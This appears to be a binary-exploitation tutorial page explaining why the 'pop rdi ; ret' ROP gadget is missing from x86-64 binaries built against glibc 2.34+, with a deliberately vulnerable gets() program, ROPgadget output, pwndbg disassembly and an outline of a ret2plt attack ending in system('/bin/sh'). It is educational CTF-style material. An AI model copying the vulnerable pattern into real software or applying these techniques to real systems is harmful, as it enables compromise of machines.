The problem
What happened to ROP?
Ah the classic overflow challenge. By now most people are familiar with this style of exploit, where you have some buffer on the stack, and you can provide more data than what's been allocated for it, leading to a classic overflow. And because it's so well known, so are the techniques for it. Take the simple program below.
// gcc demo.c -o demo -no-pie -fno-stack-protector
#include <stdio.h>
int main() {
char buf[0x20];
puts("ROP me if you can!");
gets(buf);
}
It's obvious that we can overflow the buf
buffer, so from here we'd typically use the classic ret2plt attack, where we:
Use
puts
to leak a GOT entryReturn to
main
Call
system("/bin/sh")
First we're going to need to find the pop rdi ; ret
gadget, so let's run ROPgadget
.
$ ROPgadget --binary demo
Gadgets information
============================================================
0x00000000004010ab : add bh, bh ; loopne 0x401115 ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401020
0x000000000040115f : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x0000000000401078 : add byte ptr [rax], al ; add byte ptr [rax], al ; nop dword ptr [rax] ; ret
0x0000000000401160 : add byte ptr [rax], al ; add cl, cl ; ret
0x000000000040111a : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401039 : add byte ptr [rax], al ; jmp 0x401020
0x0000000000401161 : add byte ptr [rax], al ; leave ; ret
0x000000000040107a : add byte ptr [rax], al ; nop dword ptr [rax] ; ret
0x0000000000401034 : add byte ptr [rax], al ; push 0 ; jmp 0x401020
0x0000000000401044 : add byte ptr [rax], al ; push 1 ; jmp 0x401020
0x0000000000401009 : add byte ptr [rax], al ; test rax, rax ; je 0x401012 ; call rax
0x000000000040111b : add byte ptr [rcx], al ; pop rbp ; ret
0x0000000000401162 : add cl, cl ; ret
0x00000000004010aa : add dil, dil ; loopne 0x401115 ; nop ; ret
0x0000000000401047 : add dword ptr [rax], eax ; add byte ptr [rax], al ; jmp 0x401020
0x000000000040111c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401117 : add eax, 0x2f03 ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401118 : add ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401013 : add esp, 8 ; ret
0x0000000000401012 : add rsp, 8 ; ret
0x00000000004010a8 : and byte ptr [rax + 0x40], al ; add bh, bh ; loopne 0x401115 ; nop ; ret
0x0000000000401010 : call rax
0x0000000000401133 : cli ; jmp 0x4010c0
0x0000000000401130 : endbr64 ; jmp 0x4010c0
0x000000000040100e : je 0x401012 ; call rax
0x00000000004010a5 : je 0x4010b0 ; mov edi, 0x404020 ; jmp rax
0x00000000004010e7 : je 0x4010f0 ; mov edi, 0x404020 ; jmp rax
0x000000000040103b : jmp 0x401020
0x0000000000401134 : jmp 0x4010c0
0x00000000004010ac : jmp rax
0x0000000000401163 : leave ; ret
0x00000000004010ad : loopne 0x401115 ; nop ; ret
0x0000000000401116 : mov byte ptr [rip + 0x2f03], 1 ; pop rbp ; ret
0x000000000040115e : mov eax, 0 ; leave ; ret
0x00000000004010a7 : mov edi, 0x404020 ; jmp rax
0x00000000004010af : nop ; ret
0x000000000040112c : nop dword ptr [rax] ; endbr64 ; jmp 0x4010c0
0x000000000040107c : nop dword ptr [rax] ; ret
0x00000000004010a6 : or dword ptr [rdi + 0x404020], edi ; jmp rax
0x000000000040111d : pop rbp ; ret
0x0000000000401036 : push 0 ; jmp 0x401020
0x0000000000401046 : push 1 ; jmp 0x401020
0x0000000000401016 : ret
0x0000000000401042 : ret 0x2f
0x0000000000401022 : retf 0x2f
0x000000000040100d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x0000000000401169 : sub esp, 8 ; add rsp, 8 ; ret
0x0000000000401168 : sub rsp, 8 ; add rsp, 8 ; ret
0x000000000040100c : test eax, eax ; je 0x401012 ; call rax
0x00000000004010a3 : test eax, eax ; je 0x4010b0 ; mov edi, 0x404020 ; jmp rax
0x00000000004010e5 : test eax, eax ; je 0x4010f0 ; mov edi, 0x404020 ; jmp rax
0x000000000040100b : test rax, rax ; je 0x401012 ; call rax
Unique gadgets found: 53
Wait a second. Where's pop rdi ; ret
? It should be here somewhere right??? Well actually a lot of gadgets here are missing such as:
pop rdi ; ret
pop rsi ; pop r15 ; ret
pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
So what's going on? Let's investigate, shall we?
Where does pop rdi ; ret
come from?
pop rdi ; ret
come from?Where did it come from, and where did it go? Where did it come from cotton eye joe?
To find this out, let's take a binary which has this gadget (which hasn't been stripped). There's plenty to choose from from countless CTFs, so I chose hackthebox's ropme
. Running ROPgadget
.
ROPgadget --binary ropme
Gadgets information
============================================================
...
0x00000000004006d3 : pop rdi ; ret
...
Let's see where this lies in the binary.
pwndbg> x/2i 0x00000000004006d3
0x4006d3 <__libc_csu_init+99>: pop rdi
0x4006d4 <__libc_csu_init+100>: ret
So it seems our beloved gadget belongs to a function called __libc_csu_init
.
pwndbg> disassemble __libc_csu_init
Dump of assembler code for function __libc_csu_init:
0x0000000000400670 <+0>: push r15
0x0000000000400672 <+2>: push r14
0x0000000000400674 <+4>: mov r15d,edi
0x0000000000400677 <+7>: push r13
0x0000000000400679 <+9>: push r12
0x000000000040067b <+11>: lea r12,[rip+0x20078e] # 0x600e10
0x0000000000400682 <+18>: push rbp
0x0000000000400683 <+19>: lea rbp,[rip+0x20078e] # 0x600e18
0x000000000040068a <+26>: push rbx
0x000000000040068b <+27>: mov r14,rsi
0x000000000040068e <+30>: mov r13,rdx
0x0000000000400691 <+33>: sub rbp,r12
0x0000000000400694 <+36>: sub rsp,0x8
0x0000000000400698 <+40>: sar rbp,0x3
0x000000000040069c <+44>: call 0x4004b0 <_init>
0x00000000004006a1 <+49>: test rbp,rbp
0x00000000004006a4 <+52>: je 0x4006c6 <__libc_csu_init+86>
0x00000000004006a6 <+54>: xor ebx,ebx
0x00000000004006a8 <+56>: nop DWORD PTR [rax+rax*1+0x0]
0x00000000004006b0 <+64>: mov rdx,r13
0x00000000004006b3 <+67>: mov rsi,r14
0x00000000004006b6 <+70>: mov edi,r15d
0x00000000004006b9 <+73>: call QWORD PTR [r12+rbx*8]
0x00000000004006bd <+77>: add rbx,0x1
0x00000000004006c1 <+81>: cmp rbx,rbp
0x00000000004006c4 <+84>: jne 0x4006b0 <__libc_csu_init+64>
0x00000000004006c6 <+86>: add rsp,0x8
0x00000000004006ca <+90>: pop rbx
0x00000000004006cb <+91>: pop rbp
0x00000000004006cc <+92>: pop r12
0x00000000004006ce <+94>: pop r13
0x00000000004006d0 <+96>: pop r14
0x00000000004006d2 <+98>: pop r15
0x00000000004006d4 <+100>: ret
End of assembler dump.
Interestingly the function's disassembly doesn't seem to contain pop rdi ; ret
? That's because pop rdi ; ret
doesn't show up in regular code, but rather comes from splitting an instruction in half, specifically pop r15
. You may have noticed that we have __libc_csu_init+98
and __libc_csu_init+100
in the disassembly, but pop rdi ; ret
is at __libc_csu_init+99
.
Quirk of x86
pop r15 ; ret = 41 5f c3
~~~~~
pop rdi ; ret = 5f c3
~~~~~
The above is how these instructions get assembled. You can notice that pop r15 ; ret
is longer, but the last 2 bytes are the same as pop rdi ; ret
(for some reason). Due to how x86 instructions aren't fixed-length like ARM, we can execute an instruction from any point. So, we could take the address of pop r15 ; ret
, increment it by 1, and get pop rdi ; ret
.
pwndbg> x/2i 0x00000000004006d2
0x4006d2 <__libc_csu_init+98>: pop r15
0x4006d4 <__libc_csu_init+100>: ret
pwndbg> x/2i 0x00000000004006d2+1
0x4006d3 <__libc_csu_init+99>: pop rdi
0x4006d4 <__libc_csu_init+100>: ret
So wherever there is a pop r15
, there will also be pop rdi
. And since __libc_csu_init
will always contain pop r15 ; ret
, binaries with __libc_csu_init
will have pop rdi ; ret
!
Where did pop rdi ; ret
go?
pop rdi ; ret
go?So if any binary containing __libc_csu_init
has the pop rdi
gadget, what's happening in the demo binary?
pwndbg> info functions
All defined functions:
Non-debugging symbols:
0x0000000000401000 _init
0x0000000000401030 puts@plt
0x0000000000401040 gets@plt
0x0000000000401050 _start
0x0000000000401080 _dl_relocate_static_pie
0x0000000000401090 deregister_tm_clones
0x00000000004010c0 register_tm_clones
0x0000000000401100 __do_global_dtors_aux
0x0000000000401130 frame_dummy
0x0000000000401136 main
0x0000000000401168 _fini
Aha! In the demo binary, __libc_csu_init
is not present! But why is that?
Well recently in glibc 2.34, there was a patch which stopped __libc_csu_init
being compiled into binaries. The patch was designed to remove useful ROP gadgets for ret2csu
, and has the effect of removing pop rdi ; ret
in binaries compiled against glibc 2.34+.
Side note on __libc_start_main
__libc_start_main
This would change a few things, such as __libc_start_main
, which took __libc_csu_init
as an argument, expecting it to be run. Now that it doesn't exist, it still takes the argument, but does nothing with it, so it had be versioned off for 2.34, as it now had different behaviour. This meant that you couldn't run binaries compiled for 2.34+ on older glibc versions, otherwise you'd get the very annoying error:
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found
So you have this patch to thank for this :)
Sooo what now?
So has this completely killed ROP on modern binaries? Has our time spent practising and mastering the art of ROP all been for nothing, and we'll have to move on to other types of exploits entirely?
Woah slow down, I want to argue that it hasn't. While it has thrown a wrench in how we do ROP, there are still tricks we can do to get around this, which I will showcase in the following sections.
Other sources of pop rdi ; ret
pop rdi ; ret
For one thing, __libc_csu_init
isn't our only source of pop rdi ; ret
. Recall that wherever there's pop r15 ; ret
there is pop rdi ; ret
. But why does pop r15 ; ret
show up in __libc_csu_init
?
Well normally when we compile, the variables in a function are stored on the stack. But, if we compile using optimization flags (or use register
when defining a variable), some variables can be stored in registers instead. The registers typically used include rbp
, r12
, r13
, r14
, r15
, rbx
. For this to work, a function using these registers must push the old values of these registers before using them, and then restore them when returning. This is because other functions may also be using these registers, and so this function could clobber those registers for the other function(s). So, this involves pushing these to the stack at the start, then popping them at the end. If you look back at __libc_csu_init
's disassembly above, it follows this same pattern, because it's compiled with optimization.
This means that if your binary is compiled for optimization, there is a chance r15
is used for a variable, meaning it must also be pushed, and more importantly popped, which would result in pop r15
-> pop rdi
.
This is why glibc will always contain pop rdi
, because it's compiled for optimization, and there so many functions with lots of variables stored in registers, so it's basically guaranteed that r15
is used in at least one of them.
This means that once you have a libc leak, you'll always be able to find a pop rdi ; ret
gadget. However if all you have is an overflow, and no leak, then this will still cause problems.
Summary
So if your binary doesn't have pop rdi ; ret
, then you have a few approaches:
Get a libc leak using a different bug
Controlling
rdi
some other wayUse overflow to leak libc
In the following sections, I'll show some tricks you can use to do the latter 2 approaches :)
Last updated
Was this helpful?